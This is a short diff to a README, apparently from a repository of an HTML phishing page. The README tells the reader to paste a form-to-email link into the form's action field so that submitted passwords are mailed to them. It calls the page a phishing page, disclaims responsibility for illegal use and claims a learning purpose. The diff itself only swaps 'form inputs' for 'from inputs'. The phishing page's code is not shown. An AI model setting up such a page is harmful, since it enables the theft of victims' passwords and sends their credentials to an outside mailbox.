akashsolanki1101/HTML-and-CSS-only/README.md

 ``` <form method="POST" action="PASTE URL HERE"> ```
 * paste your flipmail link in action field and it will start sending responses to your email address.
 * I am not responsible for any illegal deeds done by you after getting password through this phishing page.
-* I created this for the purpose of learning form inputs.
+* I created this for the purpose of learning from inputs.